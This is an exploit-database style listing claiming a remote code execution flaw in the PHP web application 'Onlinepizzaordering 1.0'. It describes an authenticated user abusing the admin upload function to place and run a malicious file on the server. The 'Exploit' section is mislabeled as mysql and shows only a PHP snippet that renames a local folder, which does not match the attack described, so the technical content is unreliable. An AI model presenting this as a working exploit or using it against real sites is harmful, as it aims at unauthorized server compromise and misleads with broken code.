Exploits / Vulnerability Discovered : 2023-04-08 |
Type : webapps |
Platform : php
This exploit / vulnerability Onlinepizzaordering 1.0 remote code execution (rce) is for educational purposes only and if it is used you will do on your own risk!
## Description:
The malicious user can request an account from the administrator of
this system.
Then he can use this vulnerability to destroy or get access to all
accounts of this system, even more, worst than ever.
The malicious user can upload a very dangerous file on this server,
and he can execute it via shell,
this is because he can access the upload function from the
administrator account.
The status is CRITICAL.
STATUS: HIGH Vulnerability
[+]Exploit:
```mysql
<?php
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;
// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;
// using rename() function to rename the file
rename( $old_name, $new_name) ;